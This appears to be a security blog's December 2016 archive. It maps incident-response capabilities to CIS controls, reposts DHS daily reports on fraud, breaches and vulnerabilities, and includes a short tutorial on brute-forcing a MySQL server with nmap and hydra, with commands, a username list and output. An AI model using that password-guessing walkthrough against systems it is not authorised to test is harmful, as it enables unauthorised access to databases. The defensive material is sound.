Monthly Archives: December 2016

The DFIR Hierarchy of Needs & Critical Security Controls

As you weigh how best to improve your organization's digital forensics and incident response (DFIR) capabilities heading into 2017, consider Matt Swann's Incident Response Hierarchy of Needs. Likely, at some point in your career (or therapy 😉) you've heard reference to Maslow's Hierarchy of Needs. In summary, Maslow's terms,  physiological, safety, belongingness & love, esteem, self-actualization, and self-transcendence, describe a pattern that human motivations generally move through, a pattern that is well represented in the form of a pyramid.
Matt has made great use of this model to describe an Incident Response Hierarchy of Needs, through which your DFIR methods should move. I argue that his powerful description of capabilities extends to the whole of DFIR rather than response alone. From Matt's Github, "the Incident Response Hierarchy describes the capabilities that organizations must build to defend their business assets. Bottom capabilities are prerequisites for successful execution of the capabilities above them:"

The Incident Response Hierarchy of Needs
"The capabilities may also be organized into plateaus or phases that organizations may experience as they develop these capabilities:"

Hierarchy plateaus or phases
As visualizations, these representations really do speak for themselves, and I applaud Matt's fine work. I would like to propose that a body of references and controls may be of use to you in achieving this hierarchy to its utmost. I also welcome your feedback and contributions regarding how to achieve each of these needs and phases. Feel free to submit controls, tools, and tactics you have or would deploy to be successful in these endeavors; I'll post your submission along with your preferred social media handle.
Aspects of the Center for Internet Security Critical Security Controls Version 6.1 (CIS CSC) can be mapped to each of Matt's hierarchical entities and phases. Below I offer one control and one tool to support each entry. Note that there is a level of subjectivity to these mappings and tooling, but the intent is to help you adopt this thinking and achieve this agenda. Following is an example for each one, starting from the bottom of the pyramid.

 INVENTORY - Can you name the assets you are defending?  
Critical Security Control #1: Inventory of Authorized and Unauthorized Devices
Family: System
Control: 1.4     
"Maintain an asset inventory of all systems connected to the network and the network devices themselves, recording at least the network addresses, machine name(s), purpose of each system, an asset owner responsible for each device, and the department associated with each device. The inventory should include every system that has an Internet protocol (IP) address on the network, including but not limited to desktops, laptops, servers, network equipment (routers, switches, firewalls, etc.), printers, storage area networks, Voice Over-IP telephones, multi-homed addresses, virtual addresses, etc.  The asset inventory created must also include data on whether the device is a portable and/or personal device. Devices such as mobile phones, tablets, laptops, and other portable electronic devices that store or process data must be identified, regardless of whether they are attached to the organization’s network." 
Tool option:
Spiceworks Inventory

 TELEMETRY - Do you have visibility across your assets?  
Critical Security Control #6: Maintenance, Monitoring, and Analysis of Audit Logs
Family: System
Control: 6.6      "Deploy a SIEM (Security Information and Event Management) or log analytic tools for log aggregation and consolidation from multiple machines and for log correlation and analysis.  Using the SIEM tool, system administrators and security personnel should devise profiles of common events from given systems so that they can tune detection to focus on unusual activity, avoid false positives, more rapidly identify anomalies, and prevent overwhelming analysts with insignificant alerts."
Tool option:  
AlienVault OSSIM

 DETECTION - Can you detect unauthorized actvity? 
Critical Security Control #8: Malware Defenses
Family: System
Control: 8.1
"Employ automated tools to continuously monitor workstations, servers, and mobile devices with anti-virus, anti-spyware, personal firewalls, and host-based IPS functionality. All malware detection events should be sent to enterprise anti-malware administration tools and event log servers."
Tool option:
OSSEC Open Source HIDS SECurity

 TRIAGE - Can you accurately classify detection results? 
Critical Security Control #4: Continuous Vulnerability Assessment and Remediation
Family: System
Control: 4.3
"Correlate event logs with information from vulnerability scans to fulfill two goals. First, personnel should verify that the activity of the regular vulnerability scanning tools is itself logged. Second, personnel should be able to correlate attack detection events with prior vulnerability scanning results to determine whether the given exploit was used against a target known to be vulnerable."
Tool option:
OpenVAS         

 THREATS - Who are your adversaries? What are their capabilities? 
Critical Security Control #19: Incident Response and Management
Family: Application
Control: 19.7
"Conduct periodic incident scenario sessions for personnel associated with the incident handling team to ensure that they understand current threats and risks, as well as their responsibilities in supporting the incident handling team."
Tool option:
Security Incident Response Testing To Meet Audit Requirements

 BEHAVIORS - Can you detect adversary activity within your environment? 
Critical Security Control #5: Controlled Use of Administrative Privileges
Family: System
Control: 5.1
"Minimize administrative privileges and only use administrative accounts when they are required.  Implement focused auditing on the use of administrative privileged functions and monitor for anomalous behavior."
Tool option: 
Local Administrator Password Solution (LAPS)

 HUNT - Can you detect an adversary that is already embedded? 
Critical Security Control #6: Maintenance, Monitoring, and Analysis of Audit Logs       
Family: System
Control: 6.4
"Have security personnel and/or system administrators run biweekly reports that identify anomalies in logs. They should then actively review the anomalies, documenting their findings."
Tool option:
GRR Rapid Response

 TRACK - During an intrusion, can you observe adversary activity in real time? 
Critical Security Control #12: Boundary Defense
Family: Network
Control: 12.10
"To help identify covert channels exfiltrating data through a firewall, configure the built-in firewall session tracking mechanisms included in many commercial firewalls to identify TCP sessions that last an unusually long time for the given organization and firewall device, alerting personnel about the source and destination addresses associated with these long sessions."
Tool option:
Bro

 ACT - Can you deploy countermeasures to evict and recover? 
Critical Security Control #20: Penetration Tests and Red Team Exercises       
Family: Application
Control: 20.3
"Perform periodic Red Team exercises to test organizational readiness to identify and stop attacks or to respond quickly and effectively."
Tool option:
Red vs Blue - PowerSploit vs PowerForensics


 Can you collaborate with trusted parties to disrupt adversary campaigns? 
Critical Security Control #19: Incident Response and Management       
Family: Application
Control: 19.5
"Assemble and maintain information on third-party contact information to be used to report a security incident (e.g., maintain an e-mail address of security@organization.com or have a web page http://organization.com/security)."
Tool option:
MISP

I've mapped the hierarchy to the controls in CIS CSC 6.1 spreadsheet, again based on my experience and perspective, yours may differ, but consider similar activity.

CIS CSC with IR Hierarchy mappings


My full mapping of Matt's Incident Response Hierarchy of Needs in the
CIS CSC 6.1 spreadsheet is available here: http://bit.ly/CSC-IRH

I truly hope you familiarize yourself with Matt's Incident Response Hierarchy of Needs and find ways to implement, validate, and improve your capabilities accordingly. Consider that the controls and tools mentioned here are but a starting point and that you have many other options available to you. I look forward to hearing from you regarding your preferred tactics and tools as well. Kudos to Matt for framing this essential discussion so distinctly.

Friday, December 30, 2016



Complete DHS Report for December 30, 2016

Daily Report                                            

Top Stories

• Troy, Michigan-based United Shore Financial Services LLC agreed December 28 to pay $48 million to resolve alleged violations of the False Claims Act by deliberately originating and underwriting federally insured mortgage loans. – U.S. Department of Justice See item 2 below in the Financial Services Sector

• The owner and marketing director of Salon Success Strategies was arrested December 21 in Roseville, California, for allegedly bilking 10 or more of her clients’ customers out of more than $100,000 since 2014. – Sacramento Bee See item 3 below in the Financial Services Sector

• A Romanian citizen pleaded guilty December 28 to stealing $127,000 through skimming devices on bank ATMs in Chatham and Delmar, New York, and in Great Barrington, Massachusetts, between August and October 2015. – Albany Times Union See item 4 below in the Financial Services Sector

• The U.S. President designated December 28 Bears Ears National Monument in Utah, which will span 1.35 million acres of tribal land in the Four Corners region of the State. – Associated Press

15. December 29, Associated Press – (Utah; Nevada) President designates Bears Ears National Monument in Utah. The U.S. President designated December 28 Bears Ears National Monument in Utah, which will span 1.35 million acres of tribal land in the Four Corners region of the State as part of an effort to ensure protections for lands that are home to roughly 100,000 archaeological sites. The U.S. President also designated the Gold Butte National Monument near Las Vegas, which will cover 300,000 acres of ecologically fragile land. Source: http://www.nbc11news.com/content/news/408552945.html

Financial Services Sector

2. December 28, U.S. Department of Justice – (National) United Shore Financial Services LLC agrees to pay $48 million to resolve alleged False Claims Act liability arising from FHA-insured mortgage lending. Troy, Michigan-based United Shore Financial Services LLC (USFS) agreed December 28 to pay $48 million to resolve alleged violations of the False Claims Act by deliberately originating and underwriting mortgage loans insured by the U.S. Department of Housing and Urban Development (HUD)’s Federal Housing Administration (FHA) from January 2006 – December 2011 that did not meet relevant requirements, causing HUD to insure hundreds of loans approved by USFS that were not eligible for FHA mortgage insurance under the Direct Endorsement program. As part of the settlement, USFS admitted it inappropriately pressured underwriters to approve FHA mortgages, and falsely certified that direct endorsement underwriters personally reviewed appraisal reports before USFS approved and endorsed mortgages for FHA insurance, among other violations. Source: https://www.justice.gov/opa/pr/united-shore-financial-services-llc-agrees-pay- 48-million-resolve-alleged-false-claims-act

3. December 28, Sacramento Bee – (International) Roseville police: Woman ran up fraudulent credit card charges of salon, day spa customers. The owner and marketing director of Salon Success Strategies was arrested December 21 in Roseville, California, for allegedly bilking 10 or more of her clients’ customers in California, Florida, Canada, and Australia out of more than $100,000 by fraudulently charging their credit cards since 2014.

4. December 28, Albany Times Union – (Massachusetts; New York) Feds: ATM skimmer admits stealing $127,000. A Romanian citizen pleaded guilty December 28 to stealing $127,000 through skimming devices he and a co-conspirator installed on ATMs at First Niagara Bank, TrustCo Bank, and Berkshire Bank branches in Chatham and Delmar, New York, and in Great Barrington, Massachusetts, between August and October 2015. Source: http://www.timesunion.com/local/article/Feds-ATM-skimmer-admits-stealing- 127-000-10823421.php

For another story, see item 18 below from the Commercial Facilities Sector

18. December 29, SecurityWeek – (National) InterContinental Hotels investigating possible card breach. InterContinental Hotels Group PLC (IHG) announced December 29 it is investigating a possible payment card breach at some of its U.S. locations after the firm was notified of a report of unauthorized charges occurring on customers’ debit and credit cards that were used at the company’s properties. IHG officials advised customers to monitor their payment card statements until the investigation is completed.

Information Technology Sector

16. December 28, SecurityWeek – (International) Destructive KillDisk malware turns into ransomware. A CyberX security researcher reported that a recently observed variant of the KillDisk malware encrypts each file with a specific Advanced Encryption Standard (AES) key, which are subsequently encrypted using an RSA 1028 key stored in the body of the malware, and holds the files for ransom instead of deleting them. The ransomware is designed to encrypt select types of files, including source code, emails and media files, and documents, among other file types, and requires elevated privileges.

17. December 28, SecurityWeek – (International) Vulnerabilities plague PHP 7’s unserialize mechanism. Check Point security researchers reported that PHP 7’s unserialize function is plagued with three vulnerabilities that can be exploited to read memory, forge objects, and achieve code execution on the impacted server. The researchers found that the first two flaws could enable a malicious actor to take total control of the affected server, while the third flaw can be used to create a denial-of-service (DoS) attack.
Source: http://www.securityweek.com/vulnerabilities-plague-php-7s-unserialize-mechanism

For another story, see item 13 below from the Healthcare and Public Health Sector

13. December 29, SecurityWeek – (National) FDA releases guidance for medical device cybersecurity. The U.S. Food and Drug Administration (FDA) released December 29 guidance on the management of cybersecurity risks for medical devices after they have been deployed on a patient’s home network, in a patient’s body, or on a hospital’s network, which advises medical device manufacturers to establish and maintain a process for detecting cybersecurity holes in their devices, evaluating and controlling the associated risks, and deploying hardware and software patches and updates before the vulnerabilities are exploited. The guidance states that manufacturers do not need to report the vulnerabilities to the FDA unless they result in patient death or other adverse events, or cannot be patched within 60 days.

Communications Sector

Nothing to report

Thursday, December 29, 2016



Complete DHS Report for December 29, 2016

Daily Report                                            

Top Stories

• An operator at PDC Capital Group, LLC was charged December 27 after he allegedly used the firm to defraud investors in China into investing $72 million in EB-5 projects. – U.S. Securities and Exchange Commission See item 3below in the Financial Services Sector

• Port Huron, Michigan officials reported that approximately 5,000 gallons of combined wastewater overflowed into the Black River December 26. – Port Huron Times Herald

11. December 28, Port Huron Times Herald – (Michigan) Wastewater discharges into Black River. The Port Huron Wastewater Treatment Plant in Michigan reported that approximately 5,000 gallons of combined wastewater, including roughly 500 gallons of sanitary wastewater, overflowed into the Black River by Riverside Drive at McPherson Street December 26. Source: http://www.thetimesherald.com/story/news/local/port-huron/2016/12/28/wastewater-discharges-into-black-river/95907174/

• Officials announced December 27 that the personal information of 15,000 people may have been compromised after a former patient at the New Hampshire Hospital in Concord accessed the information and posted it on the Internet in October 2015. – Associated Press

12. December 27, Associated Press – (New Hampshire) New Hampshire psychiatric patient accused of data breach. The commissioner of the New Hampshire Department of Health and Human Services announced December 27 that the personal information of 15,000 people who have received department services may have been compromised after a former patient at the New Hampshire Hospital in Concord accessed the information using a computer in the facility’s library and posted it on the Internet in October 2015. There is no evidence that the data was misused or that banking information was accessed during the breach. Source: http://www.dailyprogress.com/new-hampshire-psychiatric-patient-accused-of-data-breach/article_8b048ffe-abd5-5d6e-8854-d874962d9125.html

• The former treasurer of Ballard County, Kentucky, pleaded guilty December 27 for her role in a scheme where she obtained roughly $450,000 in bank loans without authorization from the county’s Fiscal Court. – Glasgow Daily Times

13. December 28, Glasgow Daily Times – (Kentucky) Former Ballard County treasurer guilty of bank and wire fraud. The former treasurer of Ballard County, Kentucky, pleaded guilty December 27 for her role in a scheme where she obtained roughly $450,000 in bank loans using a $500,000 Ballard County Certificate of Deposit as collateral without authorization from the county’s Fiscal Court and deceived the court about the loans by failing to report the loans and concealing the loan’s proceeds. The former treasurer also routinely wrote checks to herself for fraudulent medical reimbursement payments that totaled more than $27,000.
Source: http://www.glasgowdailytimes.com/community/former-ballard-county-treasurer-guilty-of-bank-and-wire-fraud/article_c22bff08-5be4-5935-88c9-e52e022f1031.html

Financial Services Sector

3. December 27, U.S. Securities and Exchange Commission – (International) SEC charges lawyer with stealing investor money in EB-5 offerings. A California-based attorney and operator of marketing firm PDC Capital Group, LLC was charged December 27 after he allegedly used PDC Capital to defraud investors in China into investing $72 million in several EB-5 immigrant investor program projects, which included opening Caffe Primo restaurants, and developing assisted living facilities, among other projects, and then outright stole at least $9.6 million to fund his own businesses and personal expenses despite his supposed awareness that his actions would violate Federal regulations and jeopardize the visas of the foreign investors.Source: https://www.sec.gov/news/pressrelease/2016-281.html

For another story, see item 13 above in Top Stories

Information Technology Sector

16. December 27, SecurityWeek – (International) IBM reports significant increase in ICS attacks. IBM Managed Security Services reported that the number of attacks targeting industrial control systems (ICS) increased by 110 percent in 2016 compared to 2015 due to brute force attacks on supervisory control and data acquisition (SCADA) systems. IBM stated that the U.S. was both the top destination and top source of ICS attacks observed since the beginning of 2016, with nearly 90 percent of ICS attacks targeting the U.S. and 60 percent coming from the U.S.

Communications Sector

17. December 28, SecurityWeek – (International) “Switcher” Android trojan hacks routers, hijacks traffic. Kaspersky Lab researchers discovered an Android trojan, dubbed Switcher is concealed as an Android client for the Chinese search engine, Baidu, and a Chinese app for sharing Wi-Fi network details, and once installed, guesses the username and password of the router that the infected Android device is connected to in order to hack the router and replace the device’s primary and secondary Domain Name System (DNS) servers with Internet Protocol (IP) addresses leading to rogue DNS servers in order to redirect traffic to a malicious Website. The researchers warned that Switcher targets the entire network and exposes all users to a variety of secondary attacks.

How to brute force a MySQL DB

There are many articles on how to use Metasploit or some other mighty stuff that is fine if you work with it all day. But if you just found a MySQL server on an appliance listening in your network and need to do a fast small security check there is something easier. First find the MySQL server and check the version – maybe there is a exploit available and you don’t need to try passwords. The first choice for this is nmap, just install it with sudo apt-get install nmap and call it like this:

# nmap -sV -O <IP>

Starting Nmap 7.01 ( https://nmap.org ) at 2016-xx-xx xx:xx CET
Nmap scan report for hostname (<IP>)
Host is up (0.020s latency).
Not shown: 986 closed ports
PORT STATE SERVICE VERSION
....
3306/tcp open mysql MySQL 5.6.33-79.0-log
....
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: x hops

You need to call it as root with these options. The -sV shows the versions of the listening services and -O guesses the operating system.  For brute forcing we need 3 things

  • a list of usernames to try
  • a list of passwords to try
  • a software that does the trying

The first is for one thing quite easy as the default users are known and you maybe know something about the system .. like software name or vendor name or the online download-able manual shows the username. So lets write the file:

$ cat > usernames.txt
admin
root
mysql
db
test
user

Now we need a list of likely passwords .. sure we could think about some by our own, but it is easier to download them. A good source is Skull Security. Choose your list and download it and extract it with bunzip2 xxxxx.txt.bz2. Now we only need the software … we’ll use THC Hydra, but you don’t need to download it there and compile it, as Ubuntu ships with it. Just type sudo apt-get install hydra. Now we just need to call it.

$ hydra -L usernames.txt -P xxxxx.txt <ip> mysql
Hydra v8.1 (c) 2014 by van Hauser/THC - Please do not use in military or secret service organizations, or for illegal purposes.
Hydra (http://www.thc.org/thc-hydra) starting at 2016-12-29 14:19:38
[INFO] Reduced number of tasks to 4 (mysql does not like many parallel connections)
[DATA] max 4 tasks per 1 server, overall 64 tasks, 86066388 login tries (l:6/p:14344398), ~336196 tries per task
[DATA] attacking service mysql on port 3306
[STATUS] 833.00 tries/min, 833 tries in 00:01h, 86065555 todo in 1721:60h, 4 active
.....

I think this password list is too long 😉 Choose a shorter one 😉

Wednesday, December 28, 2016



Complete DHS Report for December 28, 2016

Daily Report                                            

Top Stories

• Texas Best Proteins (Farm to Market Foods) issued a recall December 24 for approximately 25,332 pounds of its Dirty Rice products due to misbranding and undeclared peanuts. – U.S. Department of Agriculture

15. December 25, U.S. Department of Agriculture – (Texas) Texas Best Proteins recalls Cajun Style Dirty Rice containing chicken products and Turkey Cajun Dinner Kits containing Dirty Rice due to misbranding and undeclared allergens. Texas Best Proteins (Farm to Market Foods) issued a recall December 24 for approximately 25,332 pounds of its Cajun Style Dirty Rice containing chicken products and its Turkey Cajun Dinner Kits containing Dirty Rice products due to misbranding and undeclared peanuts after the company was notified by its supplier that the Worcestershire sauce used in the rice product was recalled as the sauce may contain peanut, which is not listed on the product label. There have been no confirmed reports of adverse reactions and the products were shipped to retail outlets in Texas. Source: https://www.fsis.usda.gov/wps/portal/fsis/topics/recalls-and-public-health-alerts/recall-case-archive/archive/2016/recall-122-2016-release

• Officials reported that a malfunction at the Lake Creek Lift Station in Austin, Texas, caused around 50,000 gallons of wastewater to overflow December 24. – Austin American-Statesman

18. December 24, Austin American-Statesman – (Texas) About 50,000 gallons of wastewater overflow in northwest Austin. Austin Water Utility officials reported that a malfunction at the Lake Creek Lift Station in Austin, Texas, caused around 50,000 gallons of wastewater to overflow December 24. Officials stated that none of the spillage went into the creek and the overflow did not impact the city’s drinking water supply. Source: http://www.statesman.com/news/local/about-000-gallons-wastewater-overflow-northwest-austin/bzVY6a11dhICchrfk96hON/

• Officials reached a roughly $40 million settlement December 23 to resolve claims against around 100 potentially responsible parties for the cleanup of the Peterson/Puritan, Inc. Superfund Site in Cumberland and Lincoln, Rhode Island. – U.S. Environmental Protection Agency

20. December 23, U.S. Environmental Protection Agency – (Rhode Island) Settlement reached at the Peterson/Puritan, Inc. Superfund Site in Cumberland and Lincoln, R.I. The U.S. Environmental Protection Agency, U.S. Department of Justice, and Rhode Island Department of Environmental Protection reached a more than $40 million settlement December 23 to resolve Federal and State liability claims against around 100 potentially responsible parties for the cleanup of Operable Unit Two of the Peterson/Puritan, Inc. Superfund Site in Cumberland and Lincoln, Rhode Island, following decades of hazardous waste dumping at the site that polluted the neighboring Blackstone River, groundwater, and soils. The settlement calls for the excavation and consolidation of contaminated soils and sediments, construction of a multi-layered impermeable cap, and long term monitoring, among other measures. Source: https://www.epa.gov/newsreleases/settlement-reached-petersonpuritan-inc-superfund-site-cumberland-and-lincoln-ri

• About 500 Kit Carson Electric Cooperative, Inc. customers in Arroyo Hondo, Arroyo Seco, and Questa, New Mexico, were without Internet service for roughly 36 hours December 20 – December 22 due to a hardware failure. – Taos News See item 24below in the Communications Sector

Financial Services Sector

7. December 23, SecurityWeek – (International) Phishers adopt malware distribution-like tactics. Proofpoint security researchers reported that a recently spotted phishing campaign designed to steal credit card information was employing a technique previously associated with malware distribution, which involves the distribution of a malicious Hypertext Markup Language (HTML) attachment that is XOR-encoded inside a password protected .zip archive to make detection more difficult and to convince victims that the email is legitimate. The spam emails also leveraged stolen branding and social engineering to trick users into giving away their credit card information by telling the spam recipients that they need to update their credit card security information in order to receive a new card equipped with a chip. Source: http://www.securityweek.com/phishers-adopt-malware-distribution-tactics

8. December 23, Cottage Grove Herald-Independent – (Wisconsin) Card skimmers strike Monona, Cottage Grove: Information gathered after thieves use readers, cameras at bank, credit union ATMs. Authorities in Monona, Wisconsin, are searching December 23 for 4 Romanian nationals suspected of installing card readers and cameras at outside ATMs at Monona State Bank, Old National Bank, and University of Wisconsin Credit Union locations in Monona, as well as at a Cottage Grove branch of Monona State Bank between November and December 2016. Source: http://www.hngnews.com/monona_cottage_grove/article_e3a895c0-c925-11e6-b531-27fa05478e12.html

Information Technology Sector

23. December 27, SecurityWeek – (International) Critical RCE flaw patched in PHPMailer. The developers of PHPMailer released version 5.2.18 of the product to resolve a critical remote code execution (RCE) flaw after a security researcher from Legal Hackers found the flaw can be exploited by a remote, unauthenticated attacker for arbitrary code execution in the context of the Web server user in order to compromise a targeted Web application. The researcher found the vulnerability can be exploited through Website components including feedback forms, registration forms, and password reset features that use a version of PHPMailer for sending emails that is impacted by the security hole. Source: http://www.securityweek.com/critical-rce-flaw-patched-phpmailer

For another story, see item 7 above in the Financial Services Sector

Communications Sector

24. December 25, Taos News – (New Mexico) Kit Carson Internet restored after multi-day outage. About 500 Kit Carson Electric Cooperative, Inc. customers in parts of Arroyo Hondo, Arroyo Seco, and Questa, New Mexico, were without Internet service for roughly 36 hours December 20 – December 22 due to a hardware failure at 2 of the company’s substations. The exact cause of the outage remains under investigation.

Friday, December 23, 2016



The report upon which this is based was not published until December 27, 2016 at 11:42AM.  My apologies but it is beyond my control!

Complete DHS Report for December 23, 2016

Daily Report                                            

Top Stories

• The former director of fixed income for the New York State Common Retirement Fund and 2 representatives at separate broker-dealers were charged December 21 for their alleged roles in a $2.5 billion pay-to-play scheme. – U.S. Securities and Exchange Commission See item 4 below in the Financial Services Sector

• The founder and chief executive officer (CEO) of Frisco-based Texas First Financial LLC was arrested December 20 for allegedly orchestrating a Ponzi scheme that defrauded investors out of $6 million. – Downtown Austin Patch  See item 5 below in the Financial Services Sector

• More than 430 flights were delayed and 59 others were canceled at Los Angeles International Airport December 21 – December 22. – ABC News

6. December 22, ABC News – (California) Holiday travelers gripe as delays pile up at Los Angeles International Airport. More than 430 flights were delayed and 59 others were canceled at Los Angeles International Airport December 21 – December 22 due to airport construction, inclement weather, and the increased number of flights and passengers.

• Community Health Plan of Washington began notifying nearly 400,000 current and former patients December 21 that their personal information, including Social Security numbers, was exposed in a data breach. – Seattle Times; Yakima Herald-Republic

18. December 22, Seattle Times; Yakima Herald-Republic – (Washington) Data breach exposes info for 400,000 Community Health Plan members. Community Health Plan of Washington is notifying nearly 400,000 current and former patients December 21 that their personal information, including Social Security numbers, was exposed in a data breach after an anonymous caller notified the firm November 7 that they had discovered a vulnerability in the computer network of the company that provides the health organization technical services. Officials stated there is no evidence that the information was misused.

Financial Services Sector

4. December 21, U.S. Securities and Exchange Commission – (International) SEC charges former New York pension official and two brokers in pay-to-play scheme.
The former director of fixed income for the New York State Common Retirement Fund and 2 representatives at separate broker-dealers were charged December 21 for their alleged roles in a pay-to-play scheme where the director used his position to divert $2.5 billion in State business to the brokers’ firms in exchange for over $100,000 worth of illicit bribes and benefits from January 2014 – February 2016. The charges allege that the scheme netted the brokers millions of dollars in commissions, and allege that the brokers provided considerable assistance to the State official in hiding the scheme from the Retirement Fund.

5. December 20, Downtown Austin Patch – (Texas) Dallas man billing self as financial guru via investment seminars arrested in alleged Ponzi scheme. The founder and chief executive officer (CEO) of Frisco-based Texas First Financial LLC was arrested December 20 for allegedly orchestrating a Ponzi scheme that defrauded investors out of $6 million from the sale of notes, stock certificates, and investment contracts in Dallas-based StaMedia Group from 2014 to 2016 and Frisco-based TenList Inc. The executive and his sales associates allegedly raised money from StaMedia investors without disclosing that the business had negligible revenue and net income since its establishment in 2013, and reportedly concealed ongoing Federal investigations into his sale of investments. Source: http://patch.com/us/across-america/man-billing-himself-financial-guru-investment-seminars-arrested-alleged-ponzi

Information Technology Sector

22. December 21, SecurityWeek – (International) Rakos malware takes over embedded Linux devices. ESET security researchers warned that a newly observed piece of malware, dubbed Rakos is targeting embedded Linux devices via brute force Secure Shell (SSH) login attempts in order to infect the vulnerable devices and servers with an open SSH port, and use them to create a large botnet and further spread the malware. The researchers also found that Rakos is able to update its configuration file from a specific command and control (C&C) location, and provides the attacker with complete control over an impacted device as it sends information including the device’s Internet Protocol (IP) address, username, and password.

23. December 21, SecurityWeek – (International) Vulnerabilities found in Siemens Desigo PX, SIMATIC products. Siemens released patches and workarounds to address several flaws in all versions of its SIMATIC S7-300 and S7-400 programmable logic controllers (PLCs) after researchers from Beijing Acorn Network Technology found the security holes can be exploited to obtain credentials from a PLC configuration with protection level 2, and cause a denial-of-service condition by sending maliciously crafted packets to transmission control protocol (TCP) port 80. Siemens also described a cryptographic issue in its Desigo PX product which could allow a remote attacker to reconstruct the corresponding private key. Source: http://www.securityweek.com/vulnerabilities-found-siemens-desigo-px-simatic-products

24. December 21, SecurityWeek – (International) Spam “hailstorms” deliver variety of threats. Researchers from Cisco Talos warned that a new type of spam campaign, dubbed hailstorm spam sends over 75,000 Domain Name System (DNS) queries per hour and relies on the use of a large number of Internet Protocol (IP) addresses from around the world to send the queries. Cisco determined that servers in the U.S. are targeted the most by hailstorm spam campaigns compared to other countries. Source: http://www.securityweek.com/spam-hailstorms-deliver-variety-threats

Communications Sector

Nothing to report


Tuesday, December 27, 2016



Complete DHS Report for December 27, 2016

Daily Report                                            

Top Stories

• A December 22 explosion at the New Haven Chlor-Alkali LLC facility in Connecticut prompted nearby residents to evacuate and forced the temporary shutdown of Amtrak trains from New Haven to Hartford. – New Haven Register
2. December 22, New Haven Register – (Connecticut) Explosion in New Haven damages Welton Street building, rocks nearby areas. A December 22 explosion at the New Haven Chlor-Alkali LLC facility in Connecticut caused extensive damage to the rear of the facility, prompted the evacuation of homes within 1,500 feet of the building, and forced the temporary shutdown of Amtrak trains from New Haven to Hartford after some debris from the explosion landed on the tracks. No injuries were reported and the cause of the explosion remains under investigation. Source: http://www.nhregister.com/general-news/20161222/explosion-in-new-haven-damages-welton-street-building-rocks-nearby-areas
• Two Orlando residents were charged December 22 for their alleged roles in a multi-state debit card skimming scheme that bilked over 100 victims out of thousands of dollars. – WSFA 12 Montgomery

4. December 22, WSFA 12 Montgomery – (National) AL authorities catch suspects in multi-state debit card skimming scheme. Two Orlando residents were charged December 22 for their alleged roles in a multi-state debit card skimming scheme that bilked over 100 victims in Alabama, Florida, Tennessee, and Virginia out of thousands of dollars. Authorities seized $6,490 in cash, 39 stolen debit card numbers with PIN numbers, and 315 gift cards when the suspects were arrested in Baldwin County, Alabama.  Source: http://www.wbrc.com/story/34115240/al-authorities-catch-suspects-in-multi-state-debit-card-skimming-scheme

• Teva Pharmaceutical Industries Ltd., and its subsidiary, Teva LLC agreed December 22 to pay a total of more than $283 million to resolve criminal charges associated with Foreign Corrupt Practices Act violations. – U.S. Department of Justice

21. December 22, U.S. Department of Justice – (International) Teva Pharmaceutical Industries Ltd. agrees to pay more than $283 million to resolve Foreign Corrupt Practices Act charges. Teva Pharmaceutical Industries Ltd., and its wholly-owned Russian subsidiary, Teva LLC agreed December 22 to pay a total of more than $283 million to resolve criminal charges associated with Foreign Corrupt Practices Act (FCPA) violations where the company and its subsidiaries paid millions of dollars in bribes to a high-ranking government official in Russia to influence the official to use his authority to increase sales of the firm’s drug, Copaxone, and bribed a senior government official in Ukraine to approve Teva drug registrations. In addition, the firm failed to implement adequate internal accounting controls and failed to enforce controls it had in place at its Mexican subsidiary, allowing bribes to be paid to doctors employed by the Mexican government.

• Federal officials announced December 22 that Gardena, California-based Total Call Mobile, LLC agreed to pay $30 million for defrauding the Federal Government’s Lifeline Program. – U.S. Attorney’s Office, Southern District of New York  See item 25 below in the Communications Sector

Financial Services Sector

4. December 22, WSFA 12 Montgomery – (National) AL authorities catch suspects in multi-state debit card skimming scheme. Two Orlando residents were charged December 22 for their alleged roles in a multi-state debit card skimming scheme that bilked over 100 victims in Alabama, Florida, Tennessee, and Virginia out of thousands of dollars. Authorities seized $6,490 in cash, 39 stolen debit card numbers with PIN numbers, and 315 gift cards when the suspects were arrested in Baldwin County, Alabama.  Source: http://www.wbrc.com/story/34115240/al-authorities-catch-suspects-in-multi-state-debit-card-skimming-scheme

Information Technology Sector

23. December 22, SecurityWeek – (International) Cisco CloudCenter Orchestrator flaw exploited in attacks. Cisco warned customers about a critical privilege escalation flaw that has been exploited against its CloudCenter Orchestrator (CCO) systems to allow an unauthenticated attacker to remotely install malicious Docker containers with arbitrary privileges, including root by abusing a flaw in the Docker Engine configuration. Cisco reported the flaw exists due to a misconfiguration that makes the Docker Engine management port accessible from the outside, and the flaw has been resolved with the release of CCO version 4.6.2.

Communications Sector

24. December 22, SecurityWeek – (International) Remotely exploitable 0-day impacts NETGEAR WNR2000 routers. A security researcher found that version 5 of Netgear’s WNR2000 routers are plagued with several flaws, including a stack buffer overflow issue that could allow an unauthenticated attacker to take full control of the device and remotely execute code, as well as an issue where the router allows an admin to perform various functions through a function invoked in the Hypertext Transfer Protocol (HTTP) server, uhttpd, which once reversed, allows an unauthenticated attacker to perform sensitive admin functions and retrieve the administrative password. The flaws are exploitable over a local area network (LAN), and remotely for routers with remote administration enabled. Source: http://www.securityweek.com/remotely-exploitable-0-day-impacts-netgear-wnr2000-routers

25. December 22, U.S. Attorney’s Office, Southern District of New York – (National) Manhattan U.S. Attorney announces $30 million settlement with Total Call Mobile for defrauding government program offering discounted mobile services for low-income consumers. The U.S. Federal Communications Commission (FCC) and other officials announced December 22 that Gardena, California-based Total Call Mobile, LLC agreed to pay $30 million for defrauding the Federal Government’s Lifeline Program after Total Call, Locus Telecommunications, LLC, and their shared corporate parent, KDDI America, Inc. knowingly submitted false claims to the program that sought reimbursement for tens of thousands of consumers who did not meet Lifelines eligibility requirements. As part of the settlement, Total Call agreed to no longer participate in the Lifeline Program. Source: https://www.justice.gov/usao-sdny/pr/manhattan-us-attorney-announces-30-million-settlement-total-call-mobile-defrauding

Thursday, December 22, 2016



Complete DHS Report for December 22, 2016

Daily Report                                            

Top Stories

• The U.S. President declared December 20 that hundreds of millions of acres of Federally-owned land in the Arctic Ocean and canyons in the Atlantic Ocean were withdrawn from offshore oil and gas drilling. – Washington Post

